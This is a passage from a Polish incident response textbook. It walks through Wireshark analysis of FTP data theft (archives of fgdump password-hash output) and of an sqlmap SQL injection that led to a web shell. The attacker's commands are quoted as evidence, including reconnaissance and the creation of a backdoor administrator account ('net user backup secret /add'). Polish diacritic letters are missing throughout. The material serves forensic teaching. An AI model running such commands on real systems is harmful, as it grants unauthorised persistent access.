w programie Wireshark, wczenie narzdzia Statistics/Conversations (statystyki/komunikacja)
oraz przejcie na kart TCP. Na rysunku 9.3 widoczne s obie sesje z tym samym adresem IP.
RYSUNEK 9.3. Widok Conversations w programie Wireshark
W jednej sesji nastpio poczenie z portem docelowym ftp, a w drugiej ftp-data. To zgadza
si z sesj FTP, w ktrej doszo do transferu pliku, poniewa FTP wykorzystuje dwa porty port 21. do
przekazywania polece ftp i port 20. do przesyania danych. Najatwiejszym sposobem na dowiedzenie si,
jakie polecenia FTP zostay wykonane, jest kliknicie komunikacji, w ktrej nastpio poczenie
z portem ftp, a nastpnie kliknicie przycisku Follow Stream (zbadaj strumie), co pokazano na
rysunku 9.4. Program Wireshark przeanalizuje pakiety wchodzce w skad komunikacji, wcznie
z uporzdkowaniem i obsug retransmisji, i wywietli wynik w oknie. W tym przypadku widzimy,
e polecenia FTP dotycz logowania za pomoc nazwy uytkownika frank oraz przesania pliku
o rozmiarze 608 414 bajtw o nazwie edi-source.bin. Za pomoc przycisku Save As (zapisz jako)
mona zapisa te polecenia w pliku.
RYSUNEK 9.4. Okno Follow Stream programu Wireshark
Szperajc dalej w danych komunikacji, odkrywamy pojedyncz komunikacj ftp-data.

Odkrycie to jest zgodne z widzianymi wczeniej poleceniami FTP zosta przesany jeden plik.
Komunikacje ftp-data to czyste strumienie danych plikowych, tzn. jeli odtworzy si przesyane
dane, otrzyma si kopi pliku, ktry zosta przesany. Najatwiejszym sposobem na zrobienie tego
w programie Wireshark jest kliknicie wybranej komunikacji w oknie Statistics/Conversations

i przejcie na kart TCP. Na karcie tej naley klikn przycisk Follow Stream, aby spowodowa
wywietlenie okna zawierajcego tre transferu plikowego.
Zdobyte informacje mona zapisa w pliku za pomoc przycisku Save As. Plik ten bdzie dokadn
kopi pliku przesanego w sesji. Jeli znasz powszechnie spotykane nagwki plikw, moesz zgadn,
jaki to rodzaj pliku. Nagwek Rar! oznacza archiwum i narzdzie do kompresji RAR. Jest to zbiene
z naszymi oczekiwaniami opartymi na dowodach pochodzcych z pocztkowego tropu wskazujcego
na wykonanie w systemie pliku rar.exe. Rysunek 9.5 przedstawia zawarto odzyskanego archiwum.
RYSUNEK 9.5. Zawarto odzyskanego pliku RAR edi-source.bin
Uwaga Zbienoci, na ktre zwracamy uwag, mog wydawa si oczywiste i mao pomocne,
ale z dowiadczenia wiemy, e wszelkie niespjnoci i nieoczekiwane wyniki oznaczaj luki
informacyjne, ktre naley uzupeni, przeprowadzajc dodatkowe czynnoci ledcze. Czasami jest
za mao materiau dowodowego, aby wyjani jaki brak zbienoci. W takich przypadkach naley
zdawa sobie spraw, e nasze wnioski mog by nie do koca prawidowe. Im wicej niewyjanionych
niespjnoci i nieoczekiwanych wynikw, tym mniej pewne s nasze konkluzje.
Podsumujmy, czego si dowiedzielimy. Zidentyfikowalimy zestaw polece FTP, za pomoc

ktrych przesano jeden plik o nazwie edi-source.bin i zdobylimy kopi tego pliku. Zewntrzny
adres IP, do ktrego przesano plik, 203.0.113.100, nie jest wykorzystywany w adnym normalnym
procesie dziaalnoci firmy. Wstpna analiza pliku wskazuje, e jest to archiwum RAR. To nam
wystarcza do podjcia decyzji o dokadniejszym przeanalizowaniu pliku, w celu poszukania

dalszych dowodw. Przykadowo przy otwieraniu pliku okazuje si, e jest chroniony hasem.
Katalog jest nienaruszony, wic mona utworzy list nazw plikw, ale nie mona wydoby
danych. Nazwa pliku wskazuje, e jest to archiwum zawierajce kod rdowy. Aby dosta si
do danych, mona poprosi specjalist o poszukanie w komputerze ofiary polece RAR, wrd
ktrych moe te znajdowa si potrzebne nam haso. Ewentualnie mona sprbowa zama to
haso, cho to moe potrwa bardzo dugo. Niewykluczone te, e leniwy haker uy hasa frank.
Inn moliwoci jest przebadanie sesji z innych dni zwizanych z adresem IP 203.0.113.100 lub
innych sesji z podobn nazw uytkownika. A co z t sesj? Czy da si co jeszcze z niej wycign?
Czasami warto wiedzie, czy haker wykonywa czynnoci rcznie, czy automatycznie. Jeli
korzysta z automatu, w systemie mog znajdowa si dodatkowe dowody, np. skrypty lub programy
odpowiedzialne za automatyzacj procesu. Jeeli dane sesji sugeruj automat, warto poszuka
w systemie informacji o sposobie automatyzacji. W ten sposb mona zdoby dobre tropy, np.
informacje o konwencjach nazewniczych zastosowanych w skryptach i kradzionych danych.
Jak w takim razie mona stwierdzi, czy w tej sesji proces by rczny, czy automatyczny? Czsto
najbardziej oczywist wskazwk przemawiajc za wersj rczn s bdy, np. literwki albo bdnie
wpisane polecenia, po ktrych znajduj si ich poprawione wersje. Innym dobrym wskanikiem
jest czas w procesach automatycznych odstp czasowy midzy poleceniami jest bardzo krtki.
Najatwiej si zorientowa, gdy polecenia s dugie, ale i w przypadku krtkich od razu wida, czy
zadanie zostao wykonane przez czowieka, czy nie. Przykadowo w naszej sesji wystpuj dugie
przerwy midzy probami o polecenia FTP i odpowiedziami na nie. Informacje te moemy znale
w domylnym widoku sesji w programie Wireshark (rysunek 9.6).
Proba o podanie nazwy uytkownika FTP zostaa wywietlona po 0,003 sekundy trwania sesji,
natomiast wpisanie tej nazwy nastpio 2,5 sekundy po rozpoczciu sesji. Jest to opnienie o ponad
dwie sekundy. Gdyby by uywany automat, wpisywanie nazwy uytkownika trwaoby zaledwie
kilka milisekund. Jako e automat mona tak zaprogramowa, aby imitowa aktywno czowieka,
odkrycia te nie stanowi ostatecznego dowodu na to, e w tym przypadku haker dziaa rcznie.
Jest to jednak pewna wskazwka. W tym momencie wycignlimy z drugiej sesji praktycznie
wszystkie informacje, jakie si da. Teraz wic przejdziemy do pierwszej sesji.
Pierwsza sesja komunikacji z adresem IP 203.0.113.100 nastpia okoo 15 minut wczeniej.
Przyjrzymy si jej i sprawdzimy, czy uda znale si jakiekolwiek inne fakty czce j ze ledztwem,
oprcz adresu IP. Jeli otworzymy t sesj w programie Wireshark, zauwaymy, e jest bardzo
podobna do drugiej. W tym przypadku rwnie uyto loginu frank. Na karcie TCP w oknie
Statistics/Conversations wida dwie komunikacje. Jedna to ftp, a druga to ftp-data. Za pomoc tych
samych technik, co poprzednio, przegldamy polecenia FTP i dowiadujemy si, e na zewntrzny
adres IP zosta przesany jeden plik o nazwie edi-transfer.bin. Nazwa tego pliku jest podobna do nazwy
uytej w drugiej sesji, w ktrej brzmiaa ona edi-source.bin. Podobiestwo to wskazuje na zwizek
midzy tymi dwiema sesjami. W tym przypadku plik jest znacznie mniejszy ni w drugim. Jego rozmiar
wynosi tylko 2 kB (w porwnaniu z 553 kB). Zapisujc plik w taki sam sposb jak poprzednio, widzimy
nagwek Rar!, wic znw dochodzimy do wniosku, e jest to archiwum RAR. Wydobylimy dane
i otworzylimy archiwum w programie 7-Zip. Na rysunku 9.7 pokazano jego zawarto.
RYSUNEK 9.6. Czasy strumienia w programie Wireshark
RYSUNEK 9.7. Zawarto odzyskanego pliku RAR o nazwie edi-transfer.bin

Niektre nazwy plikw pewnie od razu rozpoznasz, np. 127.0.0.1.cachedump to plik narzdzia
do wykonywania zrzutw skrtw hase w systemie Windows o nazwie fgdump. Wystarczy wpisa
nazwy tych plikw do dowolnej wyszukiwarki internetowej, aby dowiedzie si, e wszystkie nale
do tego narzdzia. Hakerzy posuguj si nim, gdy chc wykra z systemu Windows skrty hase,
ktre nastpnie ami w celu zdobycia rzeczywistych hase. Jeeli administrator niedawno logowa
si w systemie, skrt jego hasa moe by ju rozszyfrowany. Niestety plik RAR jest chroniony
hasem i nie udao si nam na razie wypakowa jego zawartoci. Gdybymy zdoali zama to haso
lub zdoby haso drugiego archiwum, to jest spora szansa, e zadziaaoby i w tym przypadku.
W kadym razie dowody ewidentnie wskazuj, e mamy do czynienia ze szkodliw dziaalnoci
oraz e ta sesja ma zwizek z t, ktr przeanalizowalimy wczeniej. Czas na podsumowanie
informacji zdobytych w drodze analizy obu sesji i zastanowienie si, co robi dalej.
Odkrylimy, e w obu sesjach przesyane byy pliki RAR chronione hasem. Nadano im nazwy wg
jednego wzoru oraz wysano je pod ten sam adres IP. Wszystko to wskazuje na zwizek midzy tymi
zdarzeniami. Na podstawie nazw plikw znajdujcych si w obu archiwach RAR nabralimy podejrze,
e jedno zawierao kod rdowy, a drugie skrty hase pobrane z systemu Windows. W celu
dokadnego zbadania zawartoci plikw RAR konieczne jest przeprowadzenie dodatkowej analizy, aby
znale polecenia RAR lub zama zabezpieczajce je haso. Ponadto trzeba ustali, dlaczego pierwsza
sesja nie zostaa wykryta przez hostowe narzdzie inspekcyjne powinnimy wykry lady wykonania
klientw RAR i FTP. Odpowiedzi na te pytania mog przyczyni si do dalszych odkry na temat
sposobu dziaania hakera oraz dostarczy lepszych wskanikw zagroenia na potrzeby ledztwa.
Na tym koczymy opis pierwszego scenariusza. Cho pewne pytania pozostay bez odpowiedzi,
np. jakie jest haso do archiww RAR, przejdziemy ju do drugiego scenariusza, w ktrym zmierzymy
si z problemem rekonesansu prowadzonego przez hakera przy uyciu konsoli sieciowej.
Rekonesans za pomoc konsoli sieciowej

W tym scenariuszu zmieniamy perspektyw. Nasz system wykrywania intruzw obserwujcy serwery
sieciowe w podsieci DMZ 203.0.113.0/24 alarmuje, e wykry skanowanie portw z wntrza strefy
DMZ. W toku ledztwa dowiadujemy si, e aktywno zostaa zainicjowana w publicznie dostpnej
usudze sieciowej na serwerze Apache, dziaajcej w systemie serwerowym Microsoft Windows pod
adresem 203.0.113.100. Na serwerze tym dziaa take instancja MySQL wykorzystywana przez serwer
sieciowy Apache. Pracownicy z dziau IT zaprzeczaj, aby kto z nich wykonywa skanowanie portw,
i twierdz, e nikt nie mia na to pozwolenia. Przegldamy wic histori logowania do serwera sieciowego
i stwierdzamy, e w tamtym czasie nikt nie by zalogowany. Postanawiamy wic dokadniej przyjrze si
serwerowi sieciowemu.
Jako e serwer jest publicznie dostpny, czujemy, e doszo do wamania do usugi sieciowej.
Zaczynamy analizowa dzienniki serwera Apache. Dzienniki te wykazuj niezwykle du liczb
da w czasie zblionym do czasu wystpienia skanowania portw. dania pochodz z nieznanego
zewntrznego adresu IP. Analiza wykazuje wiele da do wielu stron w krtkim czasie, a nastpnie
kolejne dania s wysyane ju tylko do jednej strony o nazwie /apps/login.php. W wikszoci s to
dania POST. Krtko pniej zaczynaj nadchodzi dania GET do strony /tmpbkxcn.php i sytuacja
trwa, a aktywno pochodzca od zewntrznego adresu IP zanika. dania GET do strony /tmpbkxcn.php
zawieraj acuchy typu "cmd=netstat" i "cmd=tasklist", wic pocztkowo wydaje si, e jest to
atak typu SQL injection, chocia nie ma pewnoci, czy udany. Postanawiamy przyjrze si danym
przechwyconym z sieci, aby dowiedzie si, co si stao. Specjalici, ktrzy zaimplementowali
system przechowywania caego ruchu po poprzednim incydencie, dostarczaj nam plik PCAP
zawierajcy cay ruch, jaki mia miejsce midzy serwerem sieciowym DMZ i zidentyfikowanym
przez nas zewntrznym adresem IP.
Uwaga Przykad ten pokazuje te, jak wane jest szybkie reagowanie na alarmy. W scenariuszu tym specjalici
zaimplementowali system przechowywania caego ruchu po lekcji, jak otrzymali w czasie wczeniejszego
incydentu. Oczywicie moliwoci przechowywania danych nie s nieskoczone. W przykadzie tym
zidentyfikowalimy i zapisalimy sesje, zanim system zbierajcy dane usun dane z bufora.
Otwieramy otrzymany plik w programie Wireshark i od razu dostrzegamy problem. Sesje

wystpuj na porcie tcp/443, przez ktry powinien przechodzi bezpieczny ruch SSL. Jak wida
na rysunku 9.8, ruch rzeczywicie jest szyfrowany i na tym etapie nie da si podejrze treci.
RYSUNEK 9.8. Sesja SSL ukazana w programie Wireshark

Dowiedzielimy si, e program Wireshark umoliwia rozszyfrowanie ruchu SSL i postanawiamy

wyprbowa t funkcj. Po krtkich poszukiwaniach dowiadujemy si, e aby rozszyfrowa ruch
SSL, naley speni pewne warunki. Trzeba mie klucz gwny sesji albo sesja nie moe stosowa
utajnionego przekazywania oraz naley mie prywatny klucz SSL RSA serwera. Moliwe, e pierwszy
raz w yciu spotykasz si z pojciem utajnionego przekazywania (ang. forward secrecy) jest to
technika szyfrowania, w ktrej klucze gwne sesji (klucze) s tworzone dla kadej sesji osobno,
tak e nawet majc klucz prywatny serwera, nie mona rozszyfrowa sesji. Nie wszystkie serwery
i przegldarki sieciowe obsuguj t technik, cho jest ich coraz wicej. W tym przypadku strefa
DMZ serwera nie wykorzystywaa utajnionego przekazywania, wic moemy zdoby prywatny
klucz SSL serwera i wykorzysta go do rozszyfrowania sesji za pomoc programu Wireshark.
Lokalizacja klucza SSL jest ustawiana w pliku konfiguracyjnym serwera Apache. Administrator
witryny internetowej powinien bez trudu go znale i dostarczy nam klucz lub klucze. Kiedy ma
si klucz, dodanie go do programu Wireshark jest bardzo atwe. Naley z menu wybra pozycj
Edit/Preferences (edycja/preferencje), klikn przycisk Protocols (protokoy), a nastpnie wpisa
SSL. Powinno to spowodowa pojawienie si okna preferencji widocznego na rysunku 9.9.
RYSUNEK 9.9. Klucz deszyfrowania SSL w programie Wireshark

Uwaga Co by byo, gdyby ledztwo byo prowadzone z drugiej strony poczenia? Jak dostalibymy si
do pliku certyfikatu SSL ze zdalnego serwera? W takim przypadku wszystko zaley od czynnika
ludzkiego. Istnieje spora szansa, e serwer nie naley do adnego zoczycy. Hakerzy czsto
przejmuj serwery hostingowe lub wynajmuj serwery wirtualne przy uyciu skradzionych kart
patniczych. Czsto prawdziwy waciciel lub firma hostingowa chtnie pomagaj, kiedy
dowiaduj si, e z ich systemw kto wykonuje podejrzane czynnoci. W takich przypadkach
czasami udaje si skontaktowa z wacicielem podsieci i wyjani mu problem. Mona te
zaproponowa przekazanie cennych informacji, ktre pomog mu uchroni si przed podobnymi
atakami w przyszoci.
Kliknij przycisk Edit (edytuj) znajdujcy si obok napisu RSA keys list (lista kluczy RSA).
W oknie, ktre zostanie otwarte, moesz doda nowy klucz. Wprowad adres IP serwera, port
(443) oraz protok (http), a nastpnie znajd plik klucza. Jeli klucz jest chroniony hasem, wpisz
haso w przeznaczonym na to polu tekstowym. Nastpnie kliknij przycisk OK, aby zamkn okna
konfiguracyjne. Program Wireshark automatycznie zastosuje klucz, wic jeli wprowadzisz
prawidowe informacje, od razu ujrzysz rozszyfrowan sesj, co pokazano na rysunku 9.10.
Program Wireshark domylnie pokazuje odtworzone i rozszyfrowane dane SSL na dodatkowej
karcie w okienku Packet Bytes (bajty pakietw) o nazwie Decrypted SSL data (rozszyfrowane
dane SSL). Karta ta nie jest wywietlana dla kadej ramki, poniewa program odtwarza po kilka
powizanych ze sob ramek i wywietla t kart dla ostatniej z nich.
Dysponujc rozszyfrowanymi danymi sesji w postaci czystego tekstu, mona rozpocz analiz
danych przesyanych za pomoc polece POST. Na rysunku 9.11 pokazano zawarto pakietu
obejmujc zakodowany acuch URL. Od razu zauwaamy, e wikszo da POST do strony
login.php zawiera acuch okrelajcy aplikacj uytkownika z tekstem sqlmap/1.0-dev.
Sqlmap to narzdzie suce do wyszukiwania i wykorzystywania luk w stronach internetowych
pozwalajcych na przeprowadzenie ataku typu SQL injection.
W INTERNECIE
Strona internetowa narzdzia Sqlmap sqlmap.org
Cho nie masz pewnoci, e narzdzie sqlmap rzeczywicie zostao uyte, poniewa acuch
okrelajcy nazw aplikacji uytkownika mona atwo podrobi, jednak odkrycie to jest zbiene
z dotychczas posiadanymi tropami. Postanawiasz wic przyjrze si kodowi rdowemu strony
login.php, w ktrym odkrywasz, e przyjmuje ona parametry POST bezporednio do zapytania SQL
to powane zagroenie bezpieczestwa i prawdopodobna przyczyna tego incydentu. Po duej
liczbie da do strony login.php nastpuj sporadyczne dania do strony tmpbkxcn.php.
Podejrzewasz, e moe to by konsola sieciowa, poniewa w dziennikach serwera Apache
widziae dania GET do tej strony zawierajce napis cmd=.
RYSUNEK 9.10. Rozszyfrowany ruch SSL w programie Wireshark
Wczasz wic program Wireshark, aby poszuka w pakietach szczegowych informacji

na temat pliku tmpbkxcn.php. Dowiadujesz si, e strona ta zostaa wysana na serwer za pomoc
dania POST do innej strony /tmpuiimz.php. Szukasz wic w pakietach informacji o pliku
/tmpuiimz.php i dowiadujesz si, e zosta wprowadzony do systemu za pomoc ataku SQL
injection na stron login.php. acuch okrelajcy nazw aplikacji uytkownika to sqlmap/1.0-dev
(http://sqlmap.org), wic podejrzewasz, e haker do instalacji plikw wykorzysta wbudowane
funkcje narzdzia sqlmap.
RYSUNEK 9.11. Atak SQL injection przeprowadzony za pomoc narzdzia sqlmap
Z informacji wydobytych z przechwyconych danych sieciowych wynika, e plik tmpuiimz.php

posuy tylko do pobrania pliku tmpbkxcn.php. Szukasz wic za pomoc programu Wireshark
informacji o daniach do pliku tmpbkxcn.php i przegldajc wyniki, dowiadujesz si, e haker
wykona kilka polece, m.in.:
net view,
tasklist /v,
netstat -anb,
tree c:\,
dir /s c:\,
unzip nmap-6.40-win32.zip,
113.bat.
Wiesz, e wykonanie tych polece udao si, poniewa w pliku z danymi PCAP znajduje si
wynik kadego z nich. Wikszo tych polece wskazuje na to, e haker prowadzi dziaania
rozpoznawcze. Jednak dwa z nich zmodyfikoway konta uytkownikw na serwerze sieciowym:
net user backup secret /add
net localgroup Administrators backup /add
Polecenia te posuyy do utworzenia nowego lokalnego konta uytkownika systemu Windows

o nazwie backup i dodania go do grupy administratorw. Haker prawdopodobnie liczy na to,
e uda mu si wykorzysta to konto w celu zachowania dostpu do systemu w razie kopotw.
Podsumujmy, czego si dowiedzielimy. Znalelimy dowody wskazujce, e haker za pomoc
narzdzia o nazwie sqlmap znalaz i wykorzysta luk pozwalajc na przeprowadzenie ataku typu
SQL injection w stronie login.php. Pniej intruz za pomoc tego samego programu prowadzi
w systemie czynnoci rozpoznawcze. Polegay one na wykonywaniu polece systemu operacyjnego,
np. netstat i taskview, oraz wysaniu na serwer i uruchomieniu narzdzia nmap do skanowania portw.
Ponadto haker utworzy lokalne konto uytkownika systemu Windows, ktre doda do grupy
administratorw. Na koniec intruz usun wszystkie utworzone przez siebie pliki. Dlatego wanie
zrzut caego ruchu sieciowego pozwoli nam dokadnie przeledzi poczynania hakera w systemie.
Inne narzdzia do analizy sieciowej

W obu opisanych scenariuszach przeprowadzilimy analiz za pomoc programu Wireshark, cho
to oczywicie niejedyne narzdzie tego typu. Na stronie wiki Wireshark mona znale dug list
rnych innych narzdzi do analizy danych sieciowych.
W INTERNECIE
wiki.wireshark.org/Tools
Chcielibymy przedstawi jeszcze jedno takie narzdzie, ktrego brakuje na wymienionej licie,
a ktre czsto bardzo si nam przydaje. Jest to program o nazwie NetWitness Investigator. Cho
z nazwy przypomina platform NetWitness firmy RSA, Investigator to samodzielne narzdzie do
analizy ruchu sieciowego, ktre dodatkowo umoliwia bezporednie przechwytywanie danych
sieciowych. NetWitness Investigator to darmowy program, cho aby z niego korzysta, trzeba si
zarejestrowa. Doczono do niego niewielki zrzut sesji oraz obszern dokumentacj, ktr mona
otworzy, klikajc pozycj menu Help/Help Documentation (pomoc/dokumentacja).
W INTERNECIE
www.emc.com/security/rsa-netwitness.htm#!freeware
Program NetWitness Investigator automatycznie identyfikuje sesje i wywietla je w postaci

oglnej prezentacji z podziaem na kategorie. Przykadowo wszystkie sesje s zaliczane do kategorii
Service Type (typ usugi) HTTP, DNS lub FTP. Oprcz standardowych protokow sieciowych,
NetWitness Investigator dzieli te sesje na kategorie protokow aplikacji, takie jak MSN IM, IRC
oraz wiele innych. Na rysunku 9.12 pokazano przetworzon zawarto demonstracyjnej sesji
doczonej do programu. Zwr uwag, e w oglnym widoku wida tre sesji od adresowania
po pliki wydobyte z sesji IRC i HTTP.
RYSUNEK 9.12. Program NetWitness Investigator

Widok z podziaem na kategorie pozwala na szybkie zidentyfikowanie i przejrzenie najbardziej

interesujcych rodzajw ruchu. Ponadto prezentacja taka pomaga w uwidocznieniu relacji midzy
rnymi waciwociami sesji, takimi jak konkretne adresy IP i zwizane z nimi typy usug. Jeli np.
zaznaczysz adres IP w kategorii Source IP Address (rdowy adres IP), zostan wywietlone tylko
nazwy kategorii i liczniki dotyczce tego adresu.
ZBIERANIE DZIENNIKW GENEROWANYCH

PRZEZ ZDARZENIA SIECIOWE
Podczas prowadzenia akcji dotyczcej incydentu nie przeocz adnego potencjalnego rda dowodw!
Wikszo ruchu sieciowego pozostawia gdzie po drodze rne lady. Oto kilka przykadw.
Routery, zapory sieciowe, serwery, czujniki IDS i inne urzdzenia sieciowe mog prowadzi
dzienniki zawierajce informacje o zdarzeniach majcych miejsce w sieci.
Serwery DHCP rejestruj zdarzenia dostpu do sieci, gdy jaki system da adresu.
Zapory sieciowe umoliwiaj rejestrowanie w dziennikach bardzo szczegowych informacji.
Czujniki IDS mog wykry cz ataku za pomoc mechanizmw rozpoznawania sygnatur
i filtrw wykrywania anomalii.
Czujniki hostowe mog wykrywa zmiany bibliotek systemowych i dodatki plikw
w wanych miejscach.
Pliki dziennikw systemowych z podstawowego kontrolera domeny kilka stref dalej mog
wykazywa nieudane prby uwierzytelniania podczas logowania.
Gdy poczysz wszystkie elementy ukadanki dowodw w jedn cao, moe uda Ci si
zrekonstruowa konkretne zdarzenia sieciowe, takie jak transfery plikw, ataki SQL injection
lub wamania do kont.
Dzienniki sieciowe maj pewne zalety w porwnaniu ze standardowymi dziennikami systemowymi.
Kady, kto ma dostp do systemu zdalny lub lokalny za pomoc konsoli, moe zmieni plik lub
funkcj wykonywan przez ten system. Jest to wany argument przemawiajcy za tym, e dobrze
obsugiwane dzienniki sieciowe mog by lepszym i bardziej niezawodnym rdem informacji ni
dzienniki hostowe z maszyny ofiary. Jest to szczeglnie wane w przypadkach, gdy dostp fizyczny
i za pomoc konsoli do urzdze sieciowych jest cile kontrolowany. Dzienniki inwigilacyjne s
generowane jako dowody sieciowe, ktre gromadzi si w sposb kontrolowany i z wykorzystaniem
acucha dowodowego.
Uwaga Wspominalimy o tym ju kilka razy w tym rozdziale, ale przypominamy, e dzienniki zbierane podczas
ledztwa powinno si traktowa jak dowody i odpowiednio dokumentowa w ramach acucha
dowodowego. Gdy czujniki sieciowe przechwyc ruch, naley wyeksportowa do pliku PCAP dane
przechwycone w czasie trwania incydentu, zarejestrowa je jako dowody, a nastpnie przeanalizowa.
Cho wszystkie te rda informacji sieciowych mog zawiera cenne wskazwki, czsto
dostanie si do kadego z nich moe by trudne. Dzienniki ze rde sieciowych s przechowywane
w wielu formatach, mog pochodzi z rnych systemw operacyjnych, mog wymaga specjalnego
oprogramowania do pobrania i obrbki, bywaj rozrzucone po caym wiecie oraz czasami zawieraj
niedokadne znaczniki czasu. ledczy musi wszystkie je znale i skorelowa ze sob. Zdobywanie
dziennikw z rnych miejsc wiata i systemw, przechowywanie ich w standardowy sposb oraz
rekonstruowanie na ich podstawie zdarze to czasochonne i wymagajce duo pracy zajcie. Poza
tym czsto jest tak, e nawet wszystkie dzienniki i tak nie daj penego obrazu sytuacji. Dlatego
wiele organizacji prowadzi inwigilacj swoich sieci, w sposb opisany wczeniej w tym rozdziale,
aby w razie potrzeby dysponowa wiksz iloci informacji.
I CO Z TEGO
Poleganie wycznie na metodach hostowych w celu pozyskiwania i analizy danych czsto jest
niewystarczajce do tego, by wysnu ostateczne wnioski. Ponadto, jeli na poparcie odkry na
hostach mamy informacje z sieci, nasze konkluzje bd bardziej wiarygodne. Bez czujnikw
sieciowych i sond NetFlow dziaania zaradcze mog zakoczy si fiaskiem. S to podstawowe
narzdzia pozwalajce sprawdzi, czy haker zosta skutecznie wyrugowany z naszej sieci. Zesp RI
powinien pozna te narzdzia i wiedzie, jakiego typu ruch jest normalny dla danej sieci. Dziki
temu, gdy nadejdzie pora, bdzie atwiej zidentyfikowa zagroenia. W prawie kadym ledztwie,
w ktrym dysponowalimy czujnikami, udawao nam si bardziej dogbnie zrozumie istot
problemu.
PYTANIA
1. Jakie pytania naley zada pracownikom z dziaw IT i sieciowego przy projektowaniu
architektury nowego systemu do monitorowania sieci? Jak mona pomc w zapewnieniu
kompletnej widocznoci ruchu wychodzcego z sieci?
2. W jaki sposb przez prowadzenie statystycznego monitorowania sieci mona wykry
podejrzane rodzaje aktywnoci, takie jak:
a) instalacja konia trojaskiego podrzucajcego pliki;
b) szkodliwe oprogramowanie pobierajce polecenia od zdalnej witryny;
c) potencjalna kradzie danych.
3. Co to jest doskonae utajnienie przekazywania i jaki ma wpyw na deszyfrowanie ruchu SSL?
Jak mona rozszyfrowa ruch SSL zaszyfrowany przy uyciu algorytmu utajnionego
przekazywania?
4. Jak mona szybko sprawdzi, czy w duym pliku PCAP zawierajcym tysice sesji znajduj si
lady aktywnoci FTP? W jaki sposb wydobyby przesane pliki?
ROZDZIA 10.
Usugi
dla przedsibiorstw
K
ada sie firmowa posiada infrastruktur pomocnicz zapewniajc kluczowe usugi
niezbdne do prowadzenia dziaalnoci. Niektre z tych usug mona znale tylko
w duych rodowiskach korporacyjnych, a inne s wszechobecne i mona je zidentyfikowa
w praktycznie kadej sieci. Wiele z nich nie ma zwizku z bezpieczestwem komputerowym.
Wszystkie natomiast mog pomc w wykryciu zagroenia i rozwizaniu zagadki kryminalnej.
W rozdziale tym opisujemy usugi dla przedsibiorstw i powizane z nimi aplikacje, w ktrych
ju nieraz znalelimy cenne dane podczas dziaa prowadzonych w ramach reakcji na incydent.
Opisujemy przeznaczenie kadej z przedstawionych usug, co mona z niej wydoby oraz jak to
wykorzysta w ledztwie. Na kocu rozdziau zamiecilimy krtki opis kilku technik analizy,
ktre naszym zdaniem s bardzo skuteczne. Ponadto pamitaj, e usugi te czsto s wykorzystywane
w ramach akcji naprawczej, o czym szerzej piszemy w rozdziaach 17. i 18.
Tematy, ktre poruszamy w tym rozdziale, podzielilimy na cztery kategorie; s to infrastruktura
sieciowa, zarzdzanie przedsibiorstwem, programy antywirusowe oraz obsuga aplikacji. Zaliczaj si
do nich serwery sieciowe, serwer DNS, serwery baz danych oraz narzdzia do pomiaru oprogramowania.
Trudno wama si do rodowiska bez pozostawienia jakichkolwiek ladw w przynajmniej jednej
usudze. W rozdziale tym podpowiadamy, jak szuka tych tropw. Poniewa jednak kade rodowisko
firmowe jest inne, zachcamy do sprawdzenia, jakie usugi dziaaj w Twojej organizacji. Naucz si
ich obsugi i zadbaj o ich skonfigurowanie tak, aby dostarczay Ci jak najwicej cennych informacji.
Ostrzeenie W rozdziale tym opisujemy, jakie zmiany mona wprowadzi w usugach dla przedsibiorstw,
aby byy one jak najbardziej pomocne w przypadku wystpienia ewentualnego incydentu.
Jako e zmiany te mog spowodowa przerw w dziaaniu usug, najlepiej wprowadza je
w porozumieniu z dziaem informatycznym.
USUGI INFRASTRUKTURY SIECIOWEJ

W podrozdziale tym opisujemy dwie powszechnie znane usugi stanowice podstawowy skadnik
sieci firmowych. Z dowiadczenia wiemy, e informacje, jakich dostarczaj, s cenne w kadym
ledztwie. Cho s niewielkie szanse na to, e usugi te podpowiedz, co haker prbowa zrobi,
jednak pomog nam przeledzi jego kroki i okreli zasig incydentu. Te dwie usugi to:
Dynamic Host Configuration Protocol (DHCP),
Domain Name System (DNS).
DHCP
Wikszo przedsibiorstw wykorzystuje usug DHCP do przydzielania adresw IP urzdzeniom
podczonym do sieci. Ponadto usuga ta umoliwia konfigurowanie innych ustawie sieciowych,
takich jak serwery DNS, domylne domeny, serwery NTP (ang. Network Time Protocol) oraz trasy IP.
ROZDZIA 10. USUGI DLA PRZEDSIBIORSTW 235
Protok DHCP wykorzystuje do komunikacji porty UDP 67. i 68. Aktualna specyfikacja DHCP
znajduje si w dokumencie RFC (ang. Request for Comments) 2131. Mona w nim znale szczegowe
informacje dotyczce tego standardu.
W INTERNECIE
tools.ietf.org/html/rfc2131
W ledztwie najwaniejszym aspektem DHCP jest przydzia adresw IP do systemw, zwany

dzieraw DHCP. Jako e wikszo dzieraw nie ma charakteru trwaego, kade urzdzenie moe
wielokrotnie zmienia swj adres IP. Ponadto czas trwania dzierawy mona ustawia i typowe
wartoci wahaj si w granicach od kilku minut do kilku dni, a nawet tygodni. Z tego powodu, jeli
znany jest tylko adres IP, powizanie okrelonej aktywnoci sieciowej ze rdem moe by trudne.
System aktualnie posiadajcy dany adres IP moe by cakiem innym systemem ni ten, ktremu
przydzielono ten adres w czasie, gdy doszo do podejrzanych zdarze. Jeli wic chcesz dowiedzie
si, ktry system mia przydzielony okrelony adres DHCP IP, zajrzyj do dziennikw DHCP, aby
znale mapowanie adresw IP systemu w interesujcym Ci czasie. Jeli tego nie zrobisz, moesz
zmarnowa mnstwo czasu na prowadzenie poszukiwa w niewaciwym systemie. Zazwyczaj
w dziennikach DHCP wykonujemy dwie operacje wyszukiwania.
Szukanie adresu IP pod okrelon dat w ten sposb prbujemy dowiedzie si, ktry
system mia przypisany okrelony adres IP danego dnia. Informacja ta moe by przydatna
np. przy szukaniu systemu zidentyfikowanego po adresie IP w alarmie IDS. Jako e w alarmie
podawany jest adres IP przypisany komputerowi przez DHCP, ten sposb wyszukiwania
informacji pozwala zidentyfikowa konkretny system.
Szukanie adresu MAC pod wszystkimi datami w ten sposb znajdujemy wszystkie
adresy IP i powizane z nimi daty przypisania tych adresw systemowi. Gdy system
zostanie zidentyfikowany jako skadnik incydentu, wykonujemy ten rodzaj wyszukiwania,
aby znale rda dowodw dotyczcych tych dat dla tych adresw IP. Czsto efektem jest
odkrycie wikszej iloci tropw.
Najczciej spotykanymi przez nas rozwizaniami DHCP s serwery DHCP Microsoft i Internet
Systems Consortium (ISC). Dalej opisujemy sposoby wczania rejestracji danych w dziennikach,
miejsca przechowywania dziennikw oraz informacje, jakie s dostpne. Wiadomoci te wraz
z podstawowymi metodami wyszukiwania pozwalaj dowiedzie si, ktry system mia przypisany
okrelony adres IP danego dnia i o danej godzinie. Zaczniemy od usugi DHCP firmy Microsoft.
